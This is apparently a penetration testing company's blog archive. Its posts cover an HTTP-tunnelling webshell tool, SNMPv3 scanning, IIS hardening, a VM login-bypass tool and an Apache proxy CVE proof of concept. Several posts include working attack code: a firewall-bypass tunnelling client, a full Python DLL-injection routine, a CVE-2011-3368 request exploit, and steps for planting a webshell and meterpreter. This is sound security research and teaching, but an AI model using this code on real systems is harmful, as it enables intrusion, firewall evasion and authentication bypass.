Posts Tagged ‘Penetration Testing’
 

Making Tunna (… or bypassing firewall restrictions with HTTP tunneling)

Friday, August 9th, 2013

A couple of months ago SECFORCE set out to create the ultimate webshell. The idea behind it was to include all the tools a pentester needs in one webshell and make our lives easier by, for example, dropping a meterpreter shell on the remote webserver with as little user interaction as possible.

Soon it became apparent that it would be much “cooler” for the webshell to communicate with a meterpreter shell without the need for meterpreter to expose or bind an external port. The benefits are obvious: this effectively bypasses any firewall rules in place.

It was soon realised that this could be a nice tool on its own, so the project was forked and development started. Some time later a set of webshells and the client proxies were created. The task was not as easy as it seemed, mostly because it is hard to keep the code simple and at the same time make it work across different languages. There are still some programming-language quirks that could not be bypassed or made transparent to the end user. Given the different technologies in play (web servers / web languages / client languages) and all the possible combinations, it would be very hard to tackle some of these issues and make them seamless to the end user without losing some of the tool’s flexibility. Having said that, Java proved to be the most problematic language of the bunch: it was eating bytes in large packets – the reasons are still not obvious – making both debugging and optimisation a pain. The PHP webshell also works in a somewhat different way, in that it stalls a thread on the remote server to keep the connection alive; the latter, however, is seamless to the user.

Tunna Framework - Penetration Testing

What Tunna does is open a TCP connection (socket) between the webshell and a socket local to the webserver (it is also possible to open a connection to any other machine, but let’s keep this example simple). The client also opens a local socket and starts listening for connections. When a connection is established on the local client, any communication is sent over to the webshell in an HTTP request. The webshell extracts the data and writes it to its local socket (the remote socket, from the client’s point of view). The problem with HTTP is that you cannot really have asynchronous responses, so the easiest way to tackle this was to keep polling the webshell for data. This creates a lag, but it is nothing a pentester cannot live with – at this point it must be noted once more that this is a tool “to get a remote meterpreter shell if the firewall is blocking external connections” and not for critical/real-time applications.
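To illustrate the polling mechanism, here is a minimal, hypothetical sketch of the client-side loop – not Tunna’s actual code. The webshell URL, local port and wire format below are made-up placeholders; the real protocol adds headers, encoding and session handling on top of this:

# Minimal sketch of the client-side polling loop for HTTP tunnelling.
# WEBSHELL_URL and LOCAL_PORT are made-up placeholders.
import socket
import urllib.request

WEBSHELL_URL = "http://target.example.com/conn.aspx"   # remote webshell
LOCAL_PORT = 4444                                       # local listening socket

def forward(data):
    # POST locally received bytes to the webshell; the response body carries
    # whatever the webshell has read from its own socket on the webserver.
    # An empty POST simply acts as a poll for queued data.
    req = urllib.request.Request(WEBSHELL_URL, data=data)
    with urllib.request.urlopen(req, timeout=10) as resp:
        return resp.read()

listener = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
listener.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
listener.bind(("127.0.0.1", LOCAL_PORT))
listener.listen(1)
client, _ = listener.accept()          # e.g. a metasploit handler connects here
client.settimeout(0.2)

while True:
    try:
        outgoing = client.recv(4096)   # data destined for the remote socket
        if not outgoing:
            break                      # local side closed the connection
    except socket.timeout:
        outgoing = b""                 # nothing to send: poll anyway
    incoming = forward(outgoing)       # one HTTP round trip does the tunnelling
    if incoming:
        client.sendall(incoming)       # write remote data back to the local socket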

After that, we went back to the original idea and created the metasploit module. It is still under development and should be used with extreme caution; for now it is still recommended to upload a meterpreter shell and use Tunna’s main module to connect to it. The metasploit module can be summarised as a “half rewrite of the existing code to work with, or around, the metasploit API” (mostly around), which means that “code hacks” were created as needed to make it work. To be architecturally correct with metasploit, the original idea was to create a new metasploit “handler”; however, this proved to be harder than expected and what you get is a bastardisation of handler-exploit … but it works.

Lastly, any comments, bugs or improvement ideas are welcome.

For more information, visit our Tunna Framework page.

Download: Tunna v0.1

Scanning SNMPv3 with nmap vs unicornscan

Wednesday, June 19th, 2013

Many penetration testers rely on unicornscan’s speed to perform UDP portscans. Sometimes, a first pass is made with unicornscan to detect open UDP ports and then a second pass is made with nmap on those ports to find additional information about the service.

In a recent penetration test we came across an interesting situation where nmap could detect an SNMP service running on the target but unicornscan missed it.

To understand what was happening we wiresharked both scans and compared the packets sent by both scanners.

Wireshark - portscans with unicornscan and nmap

On the left we see the packet sent by unicornscan and on the right the one sent by nmap.

What had happened was that the service running was SNMPv3, and while nmap was sending an SNMPv3 get-request, unicornscan was sending an SNMPv1 get-request, which wasn’t understood/supported by the remote service.

Fortunately, unicornscan is a flexible tool which allows the creation of custom payloads. Creating a payload is as simple as adding the new payload to the configuration file (payloads.conf). By inspecting this file we saw that, as expected, there was an SNMPv1 payload which corresponded exactly to the bytes we saw in wireshark (see selected bytes).

Following this logic, all we had to do was create a payload from the bytes selected in the second capture file. Thus, the new payload looks like this:


/* SNMPv3 payload */
udp 161 161 1 {
"\x30\x3a\x02\x01\x03\x30\x0f\x02\x02\x4a\x69\x02\x03\x00\xff\xe3"
"\x04\x01\x04\x02\x01\x03\x04\x10\x30\x0e\x04\x00\x02\x01\x00\x02"
"\x01\x00\x04\x00\x04\x00\x04\x00\x30\x12\x04\x00\x04\x00\xa0\x0c"
"\x02\x02\x37\xf0\x02\x01\x00\x02\x01\x00\x30\x00"
};

Now, when you run unicornscan it will detect SNMPv3! :)
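If you want to sanity-check the probe before adding it to payloads.conf, the same bytes can be fired at the target with a few lines of Python. This is a quick, throwaway sketch – the target address is a placeholder – and any SNMPv3 engine should answer this unauthenticated discovery request:

# Quick check that a host answers the SNMPv3 discovery probe used above.
# TARGET is a placeholder - replace it with the host under test.
import socket

TARGET = ("192.0.2.10", 161)

SNMPV3_PROBE = bytes.fromhex(
    "303a020103300f02024a69020300ffe3"
    "0401040201030410300e040002010002"
    "0100040004000400301204000400a00c"
    "020237f00201000201003000"
)

sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
sock.settimeout(3)
sock.sendto(SNMPV3_PROBE, TARGET)
try:
    data, _ = sock.recvfrom(4096)
    print("SNMPv3 service answered (%d bytes): %s" % (len(data), data.hex()))
except socket.timeout:
    print("No answer - port closed, filtered, or not speaking SNMPv3")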

Is traditional penetration testing effective at identifying risk?

Friday, December 14th, 2012

This September the Director General of GCHQ wrote to many business leaders providing them with a top ten list of priorities for achieving and maintaining a strong resilience to cyber attack.

The challenge for many board members is how to ascertain the validity of what they are being told in relation to the health of their defences. What unknown risks are being carried? There is a high risk of false assurance from internal departments reporting up the chain.

What state is your business in when it comes to cyber security?

Ask yourself the following questions:

· How effective are my perimeter defences?

· How much business impact can an anonymous attacker cause on my network?

· What is the state of health of my internal systems and networks?

· What level of security awareness is held by my staff?

· How effective are my IT and security teams at identifying and mitigating an attack?

If you are sure you know the answer and you are happy with it then you are doing well.

Many of the security assessments we are asked to undertake, although providing value, miss the point when it comes to identifying key risks. The reason is that an advanced and sophisticated attacker would not play by the rules set out in a typical test engagement. If I wanted to attack your organisation, I would carefully target your people, compromise their browsers, infiltrate their laptops or workstations, and from there begin to slowly gain a foothold in, and control of, your network. In my 10 years working at the cutting edge of penetration testing, we have performed this kind of testing only a handful of times; yet the majority of successful intrusions would use this method.

There is a mismatch, therefore: the skills exist to measure an organisation’s resilience to this form of attack, and the majority of successful breaches would use this technique, but penetration tests typically do not cater for this scenario.

A realistic attack would take the form of a discreet engagement to identify and quantify key areas of critical risk. We like to call it offensive security; the best form of defence is to know what the enemy is capable of. If you want to know the truth then you need a test combining the following elements:

· Physical – how easy would it be for an individual to gain access to one of your premises, gain access to the network, or steal a laptop, PDA or similar device (and attempt to extract the data)? Can a remote access device be planted, and will this go unnoticed?

· Technical – can your systems be penetrated? How effective are your perimeter and internal controls?

· Social – can your people be easily compromised? What level of control over your systems, data and networks can be achieved?

So to ask the question again – how well equipped are you for fending off an advanced and persistent cyber attack?

Shortcomings of following IIS security best practices

Friday, November 16th, 2012

Having a secure web application is obviously in the best interest of the business. However, in many cases development is done without security in mind. Understandably, time-to-market is an important factor for a business, but a layered security approach will be more beneficial in the long run.

As a preliminary step it is important to secure the perimeter by implementing a firewalled DMZ.

In short one must follow the configuration below:

Internet—[firewall]—[DMZ Zone]—[firewall]—Internal Network

The benefit of this configuration is that the web server only has limited access to the internal network.

The external firewall should only allow incoming connections on ports 80 (HTTP) and/or 443 (HTTPS), and only once the web application is ready for deployment. As a first step the external firewall should not allow any connections at all.

The internal firewall should allow connections only to the services that are needed and reject everything else. Additionally, it should only allow connections initiated from the internal network, and reject connections initiated from the DMZ towards the internal network.

Another obvious benefit of such a configuration is that if the web server gets compromised, the internal network will be protected and the “attacker” will not be able to use the webserver to compromise hosts on the internal network.

Moreover, having a firewall in place from the start will make it easier to configure access to the web server later on.

As a general rule every exposed service should be seen as a potential threat, as individual vulnerabilities in services can lead to full compromise of the host.

Having said that, the setup of a DMZ is not what this blog post is about, but it needed to be stated here.

Installing the server:

In this post we will emulate the scenario of a vulnerable web application and show how the web server needs to be configured in order to be protected against such applications. For this test case an installation of the latest Microsoft Windows Server 2012 Core was used, the reason being that no extra services or additional software are installed by default.

Soon after the Core installation is finished, we see the Windows Server 2012 login screen.

After successful authentication, we are greeted with an administration terminal, and we install IIS by issuing the command below:

C:\>CMD /C START /w PKGMGR.EXE /l:log.etw /iu:IIS-WebServerRole;IIS-WebServer;IIS-CommonHttpFeatures;IIS-StaticContent;IIS-DefaultDocument;IIS-DirectoryBrowsing;IIS-HttpErrors;IIS-HttpRedirect;IIS-ApplicationDevelopment;IIS-ASP;IIS-CGI;IIS-ISAPIExtensions;IIS-ISAPIFilter;IIS-ServerSideIncludes;IIS-HealthAndDiagnostics;IIS-HttpLogging;IIS-LoggingLibraries;IIS-RequestMonitor;IIS-HttpTracing;IIS-CustomLogging;IIS-ODBCLogging;IIS-Security;IIS-BasicAuthentication;IIS-WindowsAuthentication;IIS-DigestAuthentication;IIS-ClientCertificateMappingAuthentication;IIS-IISCertificateMappingAuthentication;IIS-URLAuthorization;IIS-RequestFiltering;IIS-IPSecurity;IIS-Performance;IIS-HttpCompressionStatic;IIS-HttpCompressionDynamic;IIS-WebServerManagementTools;IIS-ManagementScriptingTools;IIS-IIS6ManagementCompatibility;IIS-Metabase;IIS-WMICompatibility;IIS-LegacyScripts;WAS-WindowsActivationService;WAS-ProcessModel;IIS-ASPNET;IIS-NetFxExtensibility;WAS-NetFxEnvironment;WAS-ConfigurationAPI;IIS-ManagementService;MicrosoftWindowsPowerShell;NetFx2-ServerCore;NetFx2-ServerCore-WOW64

The initial setup included .NET but not FTP or WebDAV. In retrospect, FTP was needed to upload content and was installed later on. I must note that PKGMGR is almost apt-get awesome.

After everything is installed we start PowerShell to manage the server more effectively.

In PowerShell we can enable the IIS features that we want, e.g.:

$IISFeatures = @("Web-Asp-Net45", "Web-Net-Ext", "Web-ISAPI-Ext", "Web-ISAPI-Filter", "Web-Filtering", "Web-IP-Security")

Add-WindowsFeature -Name $IISFeatures -LogPath "$Env:ComputerName.log" -Source \\Server\Share\sources

Soon after the web server is ready and serving …

However, the default setup is not what we want. Let’s follow best practices for IIS…

As a general rule of thumb, default installations of most software are not considered secure or robust. This means that further steps are needed to secure the web server effectively. A search for “IIS best practice standards” gives us an idea of what needs to be done, as summarised below:

  1. Stop Default Web Site
  2. Stop Default application pool
  3. Each site should use its own associated Application Pool
  4. Each site should have Anonymous Authentication configured to use the AppPoolIdentity
  5. Web root directory should be on a separate disk
  6. Move the log files to the separate disk

1. Stopping default website:

In PowerShell:

Load the WebAdministration module:

  • PS:\> ipmo WebAdministration

Stop the Default Web Site from starting automatically at boot:

  • PS:\> Set-ItemProperty 'IIS:\Sites\Default Web Site' ServerAutoStart False

Stop the Default Web Site

  • PS:\> Stop-WebSite 'Default Web Site'

*Optionally: remove the Default Web Site

  • PS:\> Remove-Website 'Default Web Site'

2. Stopping Default application pool:

  • PS:\> Stop-WebAppPool DefaultAppPool

3. Each site should use its own associated Application Pool:

Create a new website and change the default web root:

  • PS:\> New-Item IIS:\Sites\Demo -bindings @{protocol='http';bindingInformation=':80:*'} -PhysicalPath F:\wwwroot\Demo

4. Each site should have Anonymous Authentication configured to use the AppPoolIdentity

  • PS:\> Set-WebConfigurationProperty /system.webServer/security/authentication/anonymousAuthentication -name userName -value ""
*At this point I must note that using PowerShell was becoming harder and more time consuming, so I started the IIS remote management service to check the configuration more effectively:
C:\> net start wmsvc

5. Fix permissions:

Root folder is at f:\wwwroot

Remove the permissions inherited from the drive root on this directory:

  • F:\>ICACLS <path_to_root> /INHERITANCE:R

Remove the Users group from being able to access this directory (only admins should have full access to the web root folder):

  • F:\>ICACLS <path_to_root> /remove Users

Allow read access to the Application Pool on the Web page folder (f:\wwwroot\Demo)

  • F:\>ICACLS <path_to_site> /grant "IIS AppPool\<app_pool_name>":(OI)(CI)R
* Another typical installation scenario would be to give full (modify) access to the Application Pool, but this is not recommended:
  • C:\> icacls <path_to_site> /grant "IIS APPPOOL\<app_pool_name>":(CI)(OI)(M)

6. Finally, move the log files to the separate disk

  • PS:\>Set-ItemProperty IIS:\Sites\Demo -name logfile.directory -value F:\weblogs

This concludes the “following best practices” part of the post. Now it is time to test the configuration. I tend to find that exploiting (as I would normally do) is the most effective way of testing. This process involves identifying the issues and then modifying the configuration to combat those issues.

Let’s exploit us !?!

As a first step, an ASP web shell was uploaded. Obviously this is not something to have on your website, but we are trying to emulate a vulnerable web application, or a web application with vulnerabilities that could allow a web shell to be uploaded.

The web shell allows us to execute commands. This is nothing unexpected – after all, it is a web shell. The first issue identified was that we could read other parts of the file system. As expected (due to the permissions set above), we cannot write to any part of the filesystem or to the websites folder.

However, it was possible to create a new folder in the disk root directory (e.g. f:\temp), and that folder gave full permissions to the Application Pool. Following that, it was possible to upload a meterpreter executable and execute it to get an interactive shell.

The reason behind this was that the default permissions on the hard disk root gave full access to any user. A very simple mistake, but one with devastating effects for the web server. Moreover, changing the permissions of the hard disk root directory was not suggested anywhere in the standards I was following. Additionally, permissions on the %TEMP% folder should also be reviewed, as typically this folder can be accessed by any user as well.

Lastly, I must add that the exploit was running with restricted user permissions. There are a number of techniques for escalating privileges, but as Windows Server 2012 is new, none of the commonly used ones was successful, at least not without rebooting the server. In any case, the server is considered exploited.

Identifying & fixing the problems:

Problem #1:

AppPool was not restricted inside the wwwroot\Demo folder and had access to other parts of the file system.

The fix is to remove user permissions on the root directories:

  • C:\> ICACLS <path_to_drive> /remove Users
  • C:\> ICACLS <path_to_drive> /remove Everyone
* For both F: and C: drives

Problem #2

Executing the exploit.

First, to make it more realistic, let’s assume the application has legitimate upload functionality, so it is possible to upload files to the web server. For this, an upload folder with read and write permissions was added.

Although we were able to upload the exploit again, the Application Pool had no execution privileges in that folder, so it was not possible to run it.

Problem #3

Although we cannot run an exploit, it is possible to upload a web shell and access it through the web server. This could be possible by abusing the upload functionality of any legitimate web application. To combat this we must instruct the server not to run ASP pages/files from within our upload folder.

To remove this functionality, create a web.config file inside the upload folder with the following content:

<?xml version="1.0" encoding="UTF-8"?>
<configuration>
  <system.webServer>
    <handlers>
      <clear />
    </handlers>
  </system.webServer>
</configuration>

This instructs the server to clear all the file handlers for this folder, so no content is served from it; for example, .asp files will no longer be handled by the ASP engine.

As we can see below, even though the webshell is inside the upload folder, when trying to access it we receive a 404 File Not Found error.
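A quick way to double-check the handler removal from the attacker’s perspective is simply to request the uploaded shell and confirm the status code. This is a throwaway sketch; the URL is a made-up example:

# Confirm that the upload folder no longer serves ASP content.
# The URL is a made-up example for this walkthrough.
import urllib.request
import urllib.error

url = "http://www.example.com/upload/shell.asp"
try:
    with urllib.request.urlopen(url, timeout=10) as resp:
        print("Unexpected: got HTTP %d - handlers are still active" % resp.status)
except urllib.error.HTTPError as err:
    # 404 is what we want: with the <handlers> section cleared, the ASP
    # engine never runs and the file is not served at all.
    print("HTTP %d - the web shell is not being served" % err.code)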

Additionally, to prevent the web.config file itself from being overwritten through the webshell (every object inside the upload folder inherits the IIS AppPool\DemoPool write permissions), its permissions should be changed to:

  • C:\> ICACLS <path>\web.config /inheritance:r /grant:r "IIS APPPOOL\DemoPool":R Administrators:F

Famous last words:

As per the above examples, following best practices helps the security of the web server, but in many cases it can lead to a dangerous false sense of security. Following any post blindly (this one included) is not recommended. Continuously testing and modifying the configuration until it reaches the desired state (where the whole configuration is as restricted as it can be) is generally a better approach, one which helps create a truly secure and robust server.

VMInjector – DLL Injection tool to unlock guest VMs

Wednesday, November 14th, 2012

Overview:

VMInjector is a tool designed to bypass OS login authentication screens of major operating systems running on VMware Workstation/Player, by using direct memory manipulation.

Description:

VMInjector is a tool which manipulates the memory of VMware guests in order to bypass the operating system authentication screen.

VMware handles the resources allocated to guest operating systems, including RAM. VMInjector injects a DLL library into the VMware process to gain access to the mapped resources. The DLL library works by parsing the memory space owned by the VMware process and locating the memory-mapped RAM file, which corresponds to the guest’s RAM image. By manipulating the allocated RAM file and patching the function in charge of authentication, an attacker gains unauthorised access to the underlying virtual host.

VMInjector can currently bypass locked Windows, Ubuntu and Mac OS X operating systems.

The in-memory patching is non-persistent, and rebooting the guest virtual machine will restore the normal password functionality.

Attacking Scenarios:

VMInjector can be used if the password of a virtual host is forgotten and requires reset.

More usually, this tool would be used during penetration testing activities, when access to a VMware host has been achieved and the attacker is looking to gain additional access to the guests running on that host.

Requirements:

  • Windows machine (with administrative access);
  • VMware workstation or player edition;
  • A locked guest VM;

Usage:

VMInjector consists of 2 parts:

  • The DLL injection application (python script or provided converted executable)
  • DLL library (x86 and x64)

The tool supports both x86 and x64 architectures by providing both DLLs. One may also use their own DLL injector to inject the library into the process of the chosen guest virtual machine running on the host.
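For reference, the classic injection primitive such a script relies on (OpenProcess, VirtualAllocEx, WriteProcessMemory and a remote LoadLibraryA thread) looks roughly like this in Python. This is a generic, hypothetical sketch rather than VMInjector’s actual source; the process ID and DLL path are placeholders:

# Generic DLL injection sketch in Python (ctypes), run as administrator.
# PID and DLL path are placeholders; error handling is kept minimal.
import ctypes
from ctypes import wintypes

kernel32 = ctypes.WinDLL("kernel32", use_last_error=True)

# Declare prototypes so 64-bit pointers are not truncated.
kernel32.OpenProcess.restype = wintypes.HANDLE
kernel32.OpenProcess.argtypes = (wintypes.DWORD, wintypes.BOOL, wintypes.DWORD)
kernel32.VirtualAllocEx.restype = ctypes.c_void_p
kernel32.VirtualAllocEx.argtypes = (wintypes.HANDLE, ctypes.c_void_p,
                                    ctypes.c_size_t, wintypes.DWORD, wintypes.DWORD)
kernel32.WriteProcessMemory.argtypes = (wintypes.HANDLE, ctypes.c_void_p,
                                        ctypes.c_char_p, ctypes.c_size_t,
                                        ctypes.POINTER(ctypes.c_size_t))
kernel32.GetModuleHandleA.restype = wintypes.HMODULE
kernel32.GetProcAddress.restype = ctypes.c_void_p
kernel32.GetProcAddress.argtypes = (wintypes.HMODULE, wintypes.LPCSTR)
kernel32.CreateRemoteThread.argtypes = (wintypes.HANDLE, ctypes.c_void_p,
                                        ctypes.c_size_t, ctypes.c_void_p,
                                        ctypes.c_void_p, wintypes.DWORD,
                                        ctypes.c_void_p)

PROCESS_ALL_ACCESS = 0x001F0FFF
MEM_COMMIT_RESERVE = 0x3000          # MEM_COMMIT | MEM_RESERVE
PAGE_READWRITE = 0x04

def inject_dll(pid, dll_path):
    path = dll_path.encode() + b"\x00"

    # Open the target process (e.g. the vmware-vmx.exe running the guest).
    process = kernel32.OpenProcess(PROCESS_ALL_ACCESS, False, pid)
    if not process:
        raise ctypes.WinError(ctypes.get_last_error())

    # Allocate a buffer in the target and copy the DLL path into it.
    remote_buf = kernel32.VirtualAllocEx(process, None, len(path),
                                         MEM_COMMIT_RESERVE, PAGE_READWRITE)
    written = ctypes.c_size_t(0)
    kernel32.WriteProcessMemory(process, remote_buf, path, len(path),
                                ctypes.byref(written))

    # kernel32.dll is mapped at the same base in every process, so the local
    # address of LoadLibraryA is also valid in the target.
    load_library = kernel32.GetProcAddress(
        kernel32.GetModuleHandleA(b"kernel32.dll"), b"LoadLibraryA")

    # A remote thread starting at LoadLibraryA with our buffer as argument
    # makes the target process load the DLL itself.
    kernel32.CreateRemoteThread(process, None, 0, load_library,
                                remote_buf, 0, None)
    kernel32.CloseHandle(process)

# Example (hypothetical PID and DLL path):
# inject_dll(1234, r"C:\tools\VMInjector\VMInjector64.dll")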

In order to run the tool, execute the VMInjector (32 or 64) executable provided from the command line as shown in figure 1.

Figure 1: List of running guest machines.

VMWare runs each guest in a different process. VMInjector needs to be pointed to the process running the guest which requires bypass. Once the user chooses a process, it will inject the DLL into the chosen target.

Once the DLL is injected, the user will need to specify the OS, so that the memory patching can be accomplished, as shown in Figure 2.

Figure 2: Searching for OS signature in memory and patching.

Tool and Source Code:

The tool executable and source code can be found on GitHub (https://github.com/batistam/VMInjector)

Disclaimer:

This tool is for legal purposes only. The code is released under GPLv3 license.

Thanks and references:

I would like to thank Michael Ligh for his valuable research on injecting shellcode into guest virtual machines back in 2006.

I would also like to thank Carsten Maartmann-Moe for his work on Inception, a tool which can unlock locked Windows, Ubuntu and OS X machines by using the IEEE 1394 FireWire trick, first showcased by the (now obsolete) winlockpwn tool.

Credits:

Tool coded by Marco Batista

Download:

Please download this tool from GitHub

Holistic penetration testing – when 1 + 1 does not always equal 2

Sunday, October 21st, 2012

Motivated attackers don’t know about “rules of engagement”, narrow scopes of work, “no bruteforcing allowed”, etc. Attackers will follow any available path to accomplish their goal, whatever that is. It is not unrealistic to think that a highly motivated attacker would go to great lengths to perform an attack, such as compromising a slightly weaker “Application A” to gain access to the DMZ and in turn compromise the real objective, “Application B”, or testing the corporate wireless network in order to gain access to the internal network…

Although this may seem an obvious statement, many cutting-edge companies forget who they are protecting against and what the real outcome of their testing programmes should be.

Nowadays the most common penetration testing requirement is application or system focussed, with a defined scope to which penetration testing consultancies need to adhere. This is a natural approach, as dynamic companies very often develop new applications and systems which require security testing before being deployed in production. However, we see a trend among our customers where they complement their normal testing strategy with an annual holistic penetration test.

A holistic approach would include penetration testing of the infrastructure, physical penetration testing of premises, wireless testing, social engineering attacks and any other angle which is deemed relevant for the specific customer.

Results, of course, differ, but they are always very interesting. The most recurrent discovery is the realisation of the lack of security awareness among staff, who will hand over confidential information such as their username and password when presented with a credible and well-delivered phishing attack.

The fact that people are the weakest link is very often proven right and inevitably prompts the question whether the investment in defensive security should be somehow split and more resources should be invested in security awareness programmes.

CVE-2011-3368 PoC – Apache Proxy Scanner

Monday, October 10th, 2011

A recent Apache vulnerability has been made public whereby an attacker could gain unauthorised access to content in the DMZ network:

The mod_proxy module in the Apache HTTP Server 1.3.x through 1.3.42, 2.0.x through 2.0.64, and 2.2.x through 2.2.21 does not properly interact with use of (1) RewriteRule and (2) ProxyPassMatch pattern matches for configuration of a reverse proxy, which allows remote attackers to send requests to intranet servers via a malformed URI containing an initial @ (at sign) character.

SECFORCE has developed a proof of concept for this vulnerability, available for download from our security tools section on our website. The script exploits the vulnerability and allows the user to retrieve arbitrary known files from the DMZ. The tool can also be used to perform a port scan of the web server using the Apache proxy functionality, and therefore bypassing any firewall.
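The trick itself fits in a few lines: if the reverse proxy is configured with a pattern such as RewriteRule ^(.*) http://internalserver$1 [P], a request whose URI starts with @host:port makes the rewritten URL point at an arbitrary internal host, because the original prefix ends up as the userinfo part of the URL. A rough sketch of the probe follows (not the actual PoC script; host names are examples):

# Rough sketch of the CVE-2011-3368 probe: the request URI deliberately
# starts with "@", so a vulnerable reverse-proxy rewrite turns it into
# http://<prefix>@<internal_host>:<port><resource>. Host names are examples.
import socket

def proxy_probe(target, internal_host, internal_port=80, resource="/", target_port=80):
    request = (
        "GET @{ih}:{ip}{res} HTTP/1.1\r\n"
        "Host: {t}\r\n"
        "Connection: close\r\n\r\n"
    ).format(ih=internal_host, ip=internal_port, res=resource, t=target)

    sock = socket.create_connection((target, target_port), timeout=10)
    sock.sendall(request.encode())
    status_line = sock.recv(1024).split(b"\r\n", 1)[0]
    sock.close()
    # A 200/404 coming back suggests the internal port is open and proxied;
    # a 502/503 usually means the internal port is closed or filtered.
    return status_line.decode(errors="replace")

# Example:
# print(proxy_probe("www.example.com", "internalhost.local", 80, "/accounts/index.html"))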

The following output shows the usage of the tool:

python apache_proxy_scanner.py
CVE-2011-3368 proof of concept by Rodrigo Marcos

http://www.secforce.co.uk

usage():
python apache_scan.py [options]
 [options]
    -r: Remote Apache host
    -p: Remote Apache port (default is 80)
    -u: URL on the remote web server (default is /)
    -d: Host in the DMZ (default is 127.0.0.1)
    -e: Port in the DMZ (enables 'single port scan')
    -g: GET request to the host in the DMZ (default is /)
    -h: Help page
examples:
 - Port scan of the remote host
    python apache_scan.py -r www.example.com -u /img/test.gif
 - Port scan of a host in the DMZ
    python apache_scan.py -r www.example.com -u /img/test.gif
	-d internalhost.local
- Retrieve a resource from a host in the DMZ
    python apache_scan.py -r www.example.com -u /img/test.gif
	-d internalhost.local -e 80 -g /accounts/index.html

The tool can be used to perform a portscan of the target host in the following way:

python apache_proxy_scanner.py -r <target> -u <uri>

The following screenshot shows the result of the command above:

Apache proxy port scan results

The script can be used to perform a bounce scan of a host in the DMZ or in the Internet:

python apache_proxy_scanner.py -r 192.168.85.161
	-u /rewrite/test -d internalhost
python apache_proxy_scanner.py -r 192.168.85.161
	-u /rewrite/test -d www.example.com

Apache_proxy_scanner will report open/filtered/closed ports in internal and external hosts.

SECFORCE is now CREST certified

Monday, July 25th, 2011

As part of SECFORCE’s commitment to ensuring the provision of high-quality services, SECFORCE has now achieved CREST certification. This will further complement our strong existing methodology and code of ethics.

SECFORCE is already recognised as one of the leading penetration testing service providers in both the UK and Europe with the ability to demonstrate expertise and professionalism to ensure clients are totally satisfied.

CREST Penetration Testing

“CREST is a not-for-profit organisation which brings a demonstrable level of expertise and professionalism to the security and penetration testing market. The bar for entry is set very high to protect the interests of the buying community and provide a clear differentiator for professional testing companies. There are very few companies in the UK who can meet the requirements of CREST, and those that do, like SECFORCE, have had to demonstrate that the processes they utilise for testing are sound, that they have adopted industry best practice in their approach to testing, and that they handle sensitive client information in an appropriate manner.”

Ian Glover, President of CREST

The addition of CREST certification will provide further reassurance and confidence to the many clients where SECFORCE has already built a strong working relationship.

“We are really pleased that CREST certification has been achieved and view this as an important step forward in the continued enhancement of our service delivery.”

Rodrigo Marcos, Technical Services Director

For more information about our CREST assessments and to discover how we can benefit your organisation, please visit our CREST penetration testing page.

GUI manipulation and penetration testing

Friday, July 15th, 2011

Whilst in the web application development world it is becoming very well understood that “you should never trust the data from the client side”, this is not always the case in local applications.

In web environments any restriction enforced at the client side can be easily bypassed with the use of a web proxy. However, security mechanisms enforced in desktop applications sometimes can be manipulated to perform unauthorised actions.

During a recent penetration test we found a desktop application which needed to be assessed in regard to security. GUI manipulation was used to conduct a number of attacks.

The tool of choice for this particular attack was “DARKER’s Enabler”:

Denabler used for GUI manipulation

DARKER’s Enabler is a tool which allows showing and enabling hidden or disabled objects (controls) in Windows applications.
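Under the hood this boils down to a couple of user32 calls: find the handle of the disabled control and call EnableWindow on it. A minimal Python sketch of the same idea follows (the window title and control caption are made-up examples):

# Minimal sketch of enabling a disabled control in another application's GUI
# via the Win32 API. The window title and control caption are made up.
import ctypes
from ctypes import wintypes

user32 = ctypes.WinDLL("user32", use_last_error=True)
user32.FindWindowW.restype = wintypes.HWND
user32.FindWindowExW.restype = wintypes.HWND

# Locate the top-level window of the target application by its title ...
hwnd = user32.FindWindowW(None, "Target Application")
if not hwnd:
    raise RuntimeError("target window not found")

# ... and then the child control, here a checkbox captioned "Encrypt".
checkbox = user32.FindWindowExW(hwnd, None, None, "Encrypt")
if not checkbox:
    raise RuntimeError("control not found")

# EnableWindow(hWnd, TRUE) re-enables the control regardless of the
# application's own client-side logic.
user32.EnableWindow(checkbox, True)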

The application to be tested had a number of disabled fields that needed to be modified for the purpose of the penetration test. Specifically, the “Encrypt” checkbox needed to be unchecked; however, the application showed the field as disabled:

Original application window

With Denabler we dragged and dropped the red square onto the target application in order to identify the window handle of the field, and then enabled it:

Denabler in action

This enabled the field and allowed the penetration testers to disable the encryption in the application, which proved vital to the outcome of the penetration test:

Window after enabling the fields

As shown above, GUI manipulation can lead to unwanted consequences. Extra caution needs to be exercised during the planning and development of desktop applications to minimise the risk of such attacks: never rely on client-side controls alone to enforce security decisions.

SECFORCE invited to present at Athcon

Saturday, June 18th, 2011

SECFORCE was invited to present at Athcon conference, held in Athens during 2nd and 3rd June 2011.

AthCon is an annual IT security conference that takes place in Athens, Greece, designed to give a technical insight into the world of IT security: a realistic, practical view of current and evolving threats and security trends, presented by top international security experts.

Athcon

SECFORCE presented a talk called “What you didn’t know about Metasploit”, covering the history of the Metasploit Framework, architecture, exploitation and post-exploitation features.

The Metasploit Framework is mainly used for exploitation purposes during penetration testing engagements.

You can download the slides from the talk from our security research area.

 
   
 